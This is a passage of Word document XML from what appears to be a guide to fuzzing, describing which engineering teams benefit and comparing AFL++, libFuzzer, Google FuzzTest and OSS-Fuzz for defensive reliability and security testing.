        <w:t xml:space="preserve">Who Benefits and How: Organizational Impact Across Roles</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="32" w:name="X330e85177a1ed3a661e07bbf9095aeac00b79ee"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Development Teams: Enhanced Daily Workflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Software engineers face a daily dilemma: ship features quickly or test thoroughly. Traditional testing forces this false choice because manual validation simply can’t explore the millions of input combinations that modern applications must handle. Fuzzing eliminates the dilemma through automation that scales beyond human capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Consider a typical development scenario:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A team building a financial services API implements comprehensive unit tests for normal transaction processing, validates error handling for documented failure modes, and verifies integration with external payment systems. However, manual testing cannot explore the millions of possible input combinations that could trigger edge cases in transaction validation logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fuzzing discovers the specific input combinations that expose integer overflow conditions in balance calculations, reveal race conditions in concurrent transaction processing, and uncover parsing errors in payment message handling. These discoveries happen during development when fixes integrate seamlessly into normal workflows rather than requiring emergency response procedures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Teams report measurable improvements in deployment confidence and operational stability.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Netflix’s engineering teams use fuzzing to validate microservices before production deployment, reporting a 40% reduction in service-related incidents after systematic fuzzing adoption. Dropbox integrated fuzzing into their file processing pipelines, discovering multiple memory corruption vulnerabilities that could have caused data loss for millions of users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Development teams in regulated industries find fuzzing particularly valuable because failure consequences extend beyond user inconvenience to regulatory compliance and legal liability. Healthcare applications processing patient data must maintain absolute reliability, while automotive software controlling vehicle systems requires confidence in edge case handling that traditional testing approaches cannot provide.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The workflow integration becomes natural when fuzzing provides immediate feedback during active development.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Teams configure continuous integration pipelines to run fuzzing campaigns on every commit, catching regressions within minutes rather than discovering problems during staging or production deployment.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="33" w:name="Xfef670aea092a991536c67df557b62c5eb23cd0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Platform and Infrastructure Teams: Multiplying Organizational Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Platform engineers face a multiplier effect: every bug they miss affects dozens of dependent applications. When a shared authentication library contains a vulnerability, it doesn’t just threaten one service—​it creates security risks across the entire technology stack. This is where fuzzing becomes a force multiplier rather than just another testing tool.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Platform teams achieve leverage through coordinated fuzzing of critical dependencies.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Consider a large organization with hundreds of microservices that depend on common libraries for JSON processing, database connectivity, and cryptographic operations. Traditional testing validates each service individually, but fuzzing the shared components protects the entire ecosystem simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Companies like Uber and Lyft use enterprise fuzzing platforms to coordinate testing across their service architectures. Uber’s platform team reports discovering critical vulnerabilities in location processing libraries that could have affected ride matching algorithms for millions of users. Lyft’s infrastructure team uses continuous fuzzing to validate payment processing components, preventing potential financial calculation errors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The scale economics become compelling quickly.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Testing one shared library with intensive fuzzing requires substantial computational resources, but the protection extends to every dependent service without additional per-service investment. This leverage enables platform teams to provide reliability guarantees that individual development teams could not achieve independently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enterprise fuzzing platforms like OSS-Fuzz enable coordination across organizational boundaries while maintaining cost efficiency. Google reports that OSS-Fuzz has discovered over 26,000 bugs in critical open-source projects, protecting not just Google’s infrastructure but every organization that depends on these foundational components.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="33"/>
    <w:bookmarkStart w:id="34" w:name="Xdf2f16432b3653a8678354ee60c3ceeb1751d97"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Security Engineers: Expanding Vulnerability Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Security professionals tasked with finding vulnerabilities before attackers do face limitations in traditional scanning approaches. Static analysis tools excel at pattern recognition—​finding SQL injection possibilities and buffer overflow candidates—​but miss novel attack vectors that emerge from unexpected input combinations and complex application state transitions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fuzzing expands vulnerability discovery beyond known attack patterns.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Security teams uncover attack surfaces that emerge from legitimate functionality pushed beyond intended boundaries, discover privilege escalation conditions that exist only under specific input sequences, and find data validation inconsistencies that enable unauthorized access or information disclosure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Microsoft’s Security Response Center uses fuzzing extensively to validate Windows components, reporting discovery of hundreds of security vulnerabilities that traditional security testing approaches missed. The team found that fuzzing revealed vulnerabilities in 15% of tested components, with many requiring millions of test cases to trigger reliably.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Differential fuzzing techniques prove particularly valuable for security validation.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Comparing different implementations, versions, or configurations with identical inputs surfaces consistency failures that often indicate security vulnerabilities. Authentication systems that behave differently for edge cases may enable bypass attacks, while cryptographic implementations that produce different results could reveal side-channel vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Financial services organizations use fuzzing to validate trading systems and payment processors where security failures could enable fraud or market manipulation. Healthcare companies apply fuzzing to patient management systems where unauthorized access could compromise sensitive medical information and violate regulatory requirements.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="34"/>
    <w:bookmarkStart w:id="35" w:name="Xbcc2b92f7d52dc5ed8e6a1a951ba92380867598"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DevOps and SRE Teams: Automating Reliability Validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Site reliability engineers and DevOps teams maintain service availability while enabling rapid deployment cycles that business requirements demand. Traditional reliability validation relies on production monitoring and incident response—​reactive approaches that leave organizations vulnerable to unknown failure modes until they cause visible customer impact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fuzzing enables proactive reliability validation that integrates with deployment pipelines.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Teams catch reliability regressions before they reach production environments, validate that each deployment maintains robustness standards required for service level objectives, and build confidence in deployment decisions through systematic testing rather than hoping monitoring systems detect problems quickly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cloudflare’s SRE team uses fuzzing to validate edge computing components that process millions of requests per second across their global network. They report that fuzzing discovered performance degradation conditions that could have caused service outages affecting thousands of websites during traffic spikes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Integration provides multiple feedback mechanisms optimized for different operational requirements.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Rapid validation cycles check obvious reliability properties within minutes of code changes. Comprehensive background testing explores deep application states during off-peak hours. Intensive periodic campaigns provide thorough validation before major releases or infrastructure changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Streaming media companies like Spotify and Netflix use fuzzing to validate content delivery systems where failures directly impact user experience and customer satisfaction. These teams report that systematic fuzzing reduces production incidents by identifying edge cases in audio/video processing that could cause playback failures or service unavailability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Now that you understand who benefits and why, let’s examine the practical tools that make this possible.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Modern fuzzing isn’t a single technique—​it’s a toolkit of approaches optimized for different scenarios.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:bookmarkEnd w:id="36"/>
    <w:bookmarkStart w:id="45" w:name="X87551dbd8319917351d24a5d587642262288099"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modern Approaches and Tooling Landscape</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modern fuzzing offers different approaches for different challenges. Understanding when each approach works best enables you to build testing strategies that address your specific needs effectively.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="37" w:name="X8c82d18ef265f23a18bd8c69a5de7501e3dfcb6"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Coverage-Guided File Fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">AFL++ is your go-to choice for testing anything that reads files or structured data.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Think image processors that crash on malformed PNGs, document parsers that hang on corrupted PDFs, or configuration readers that fail when someone hand-edits a settings file. AFL++ excels at navigating these complex input formats to find the edge cases that break your parsers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AFL++ uses sophisticated mutation strategies that combine random bit flips, arithmetic operations, dictionary-based substitutions, and splice operations that combine elements from different test cases. The tool monitors code coverage during execution and prioritizes mutations that exercise previously unexplored code regions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Why does this matter in practice?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">When AFL++ finds an input that triggers a new code path—​say, a specific image header that bypasses initial validation—​it evolves that input further to explore what lies beyond. This guidance lets the fuzzer navigate complex parsing logic that random inputs would never penetrate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">File-based fuzzing works best for applications with complex input parsing logic.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">When applications need to navigate intricate file formats, validate structured data, or handle protocol specifications, AFL++ can systematically explore the input space to find edge cases that manual testing would miss.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The approach requires minimal application modification—​typically just recompiling with coverage instrumentation and creating simple wrapper scripts that read fuzzer-generated files. This low barrier to entry makes AFL++ an excellent starting point for teams beginning their fuzzing journey.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Performance characteristics make AFL++ suitable for finding bugs that require extensive exploration.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The tool can execute thousands of test cases per second while maintaining corpus diversity that prevents convergence on local maxima. Teams typically run AFL++ campaigns for hours or days to discover deep bugs that require millions of iterations to trigger reliably.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Real-world success stories demonstrate AFL++'s effectiveness across diverse application domains. Image processing libraries, PDF readers, network protocol implementations, and compression algorithms have all yielded critical vulnerabilities through systematic AFL++ campaigns conducted by security researchers and development teams.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="37"/>
    <w:bookmarkStart w:id="38" w:name="Xcf5430771596d019f515180ebaf93c86bd56384"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In-Process Library Fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">libFuzzer is built for speed—​millions of test cases per second.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">When you need to hammer a library function with massive volumes of inputs to find rare edge cases, libFuzzer delivers. Instead of starting new processes for each test (slow), it calls your functions directly within a single process (fast).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This approach proves ideal for testing individual functions, parsing routines, cryptographic implementations, and algorithmic code where performance enables extensive exploration. The high execution rate allows discovery of subtle bugs that require millions of iterations to trigger reliably.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Consider cryptographic code that only fails on one input combination out of billions.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Traditional testing might miss it entirely, but libFuzzer’s speed makes exploring that vast input space practical within reasonable time limits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">libFuzzer integrates seamlessly with Clang’s compiler infrastructure, providing automatic instrumentation and comprehensive sanitizer integration. This tight integration makes it the preferred choice for C++ projects that already use LLVM toolchains.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">In-process fuzzing requires more careful harness design</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">because crashes in one test case could corrupt process state and affect subsequent executions. However, the performance advantages often justify the additional complexity, particularly for discovering rare bugs in computational code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cryptocurrency projects use libFuzzer extensively to validate cryptographic implementations where subtle bugs could enable attacks on blockchain protocols. Google’s BoringSSL team reports discovering multiple vulnerabilities in cryptographic primitives through systematic libFuzzer campaigns that executed billions of test cases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The tool excels at finding edge cases in algorithmic implementations.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Mathematical libraries, string processing functions, and data structure operations benefit from high-throughput exploration that can trigger rare corner cases in computational logic.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkStart w:id="39" w:name="Xeab9fa39be06f19e15bef0bb3ee0d00d0b12d18"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Property-Based Reliability Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Google FuzzTest changes the game by testing rules instead of examples.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Instead of writing "when I sort [3,1,2], I should get [1,2,3]," you write "sorting any array should always return ascending order with the same elements." Then FuzzTest generates thousands of test cases to verify your rule holds true.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Property-based testing excels for validating business logic, mathematical algorithms, and data transformation pipelines where correctness depends on invariants rather than specific behaviors. Financial calculations should preserve precision constraints. Sorting algorithms should always return correctly ordered results. Encryption operations should be reversible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This approach often reveals bugs in fundamental assumptions about application behavior. The process of articulating what "correct" means forces examination of edge cases that traditional testing overlooks. Teams discover that many bugs result from incomplete understanding of requirements rather than implementation errors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Here’s what typically happens:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">You think you understand your business rules until you try to write them as universal properties. Suddenly you realize your "simple" sorting function has edge cases you never considered—​what happens with duplicate values? Empty arrays? Maximum-size inputs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Property definitions provide more actionable debugging information than crash reports</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">because they identify which business rules failed rather than just indicating that something went wrong. This specificity accelerates bug triage and resolution while providing confidence that fixes address root causes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Financial technology companies use property-based fuzzing to validate trading algorithms where mathematical correctness is essential for regulatory compliance and customer trust. Healthcare organizations apply the approach to validate medical device software where algorithmic errors could affect patient safety.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="39"/>
    <w:bookmarkStart w:id="40" w:name="X4d5438f53af4ca8452fcd5e919e3a7b9421d61a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enterprise-Scale Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OSS-Fuzz is fuzzing at enterprise scale—​think hundreds of projects running continuously.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">When you’ve moved beyond individual tools to organizational fuzzing programs, OSS-Fuzz handles the infrastructure headaches: resource allocation, bug reporting, corpus management, and coordination across teams.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enterprise platforms excel when fuzzing programs mature beyond individual tool usage to organizational reliability engineering programs. They provide centralized visibility into testing coverage, systematic bug triage workflows, and resource optimization that individual team implementations cannot match.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OSS-Fuzz integrates with existing development workflows through automated bug reporting, regression testing, and corpus management that maintains testing effectiveness as applications evolve. The platform approach scales organizational fuzzing capabilities without requiring each team to become fuzzing experts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Continuous fuzzing ensures that reliability validation happens automatically rather than requiring manual campaign execution or periodic testing cycles. This automation catches regressions immediately while providing ongoing exploration that discovers new bugs as applications grow in complexity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enterprise adoption timing requires careful orchestration. Begin fuzzing integration during planned architecture reviews or major refactoring cycles when teams have bandwidth to learn new tools. Avoid starting during crunch periods, major incident response, or immediately before critical releases. Most organizations benefit from 2-3 month adoption cycles that allow for tool evaluation, team training, and process integration before expecting production-level results.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Major open-source projects including Linux kernel components, popular programming language interpreters, and widely-used networking libraries benefit from OSS-Fuzz automation. The platform has discovered thousands of vulnerabilities in critical infrastructure components that millions of applications depend upon.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="40"/>
    <w:bookmarkStart w:id="41" w:name="Xc7b45eca8b09dd598a7731807f036cc728f51f0"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool Selection Framework</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Choose AFL++ when</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">testing applications that process files, configuration data, or structured input formats. The tool’s sophisticated mutation strategies and extensive customization options make it ideal for exploring complex input spaces that require careful navigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">File processing applications—​document readers, image processors, archive handlers—​typically yield significant bug discoveries from AFL++ campaigns because these applications must parse complex, structured data formats where edge cases frequently hide.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Choose libFuzzer when</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">testing library functions, API endpoints, or computational code that benefits from high-throughput execution. The performance advantages enable discovery of subtle bugs that require extensive exploration to trigger reliably.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cryptographic libraries, mathematical functions, and string processing routines often require millions of test cases to reveal edge cases in algorithmic implementations. libFuzzer’s execution speed makes this exploration practical within reasonable time constraints.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Choose Google FuzzTest when</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">testing business logic, algorithmic implementations, or data processing pipelines where correctness depends on mathematical invariants. Property-based approaches verify universal rules rather than specific examples.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Applications with complex business rules—​financial calculations, scientific computations, data transformation algorithms—​benefit from property-based validation that ensures correctness across all possible inputs rather than just documented test cases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Choose OSS-Fuzz when scaling fuzzing across organizational boundaries or coordinating testing for multiple projects simultaneously. Enterprise platforms provide automation and resource management that individual tool implementations cannot match.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Environmental factors influence tool selection as much as technical requirements. Cloud-first organizations can leverage OSS-Fuzz’s infrastructure immediately, while air-gapped environments require on-premise AFL++ or libFuzzer deployments. Regulated industries often start with file-based fuzzing (AFL++) to maintain data control before moving to cloud-based solutions. Startup environments typically begin with libFuzzer for simplicity before adopting enterprise platforms as they scale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Many successful fuzzing programs use multiple tools</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
